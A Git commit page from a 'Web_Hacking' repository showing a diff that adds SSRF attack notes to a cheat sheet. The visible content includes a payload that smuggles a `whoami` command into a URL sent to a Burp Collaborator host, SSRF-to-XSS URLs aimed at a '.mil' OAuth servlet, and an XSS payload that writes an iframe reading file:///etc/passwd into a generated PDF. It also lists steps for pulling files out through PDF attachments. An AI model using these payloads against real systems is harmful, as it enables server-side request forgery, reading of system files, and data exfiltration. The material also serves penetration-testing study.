vos9/Web_Hacking
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Update SSRF.md

Browse Source
This commit is contained in:
Mehdi 2023-08-23 11:28:31 +03:30 committed by GitHub
parent 024697d5c3
commit feac18369e
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 29 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

29
SSRF.md
View File

@ -291,6 +291,35 @@ url=http://3iufty2q67fuy2dew3yug4f34.burpcollaborator.net?`whoami`
Checking the time of the responses from the server it might be possible to know if a resource exists or not (maybe it takes more time accessing an existing resource than accessing one that doesn't exist)
## SSRF to XSS
```html
http://brutelogic.com.br/poc.svg //simple alert
https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri= //simple ssrf
https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri=http://brutelogic.com.br/poc.svg
```
## SSRF from XSS
**Using an iframe**
The content of the file will be integrated inside the PDF as an image or text
```javascript
<img src="echopwn" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>
```
**Using an attachment**
Example of a PDF attachment using HTML
1. use `<link rel=attachment href="URL">` as Bio text
2. use `'Download Data'` feature to get PDF
3. use `pdfdetach -saveall filename.pdf` to extract embedded resource
4. cat `attachment.bin`
# Tools
* https://github.com/swisskyrepo/SSRFmap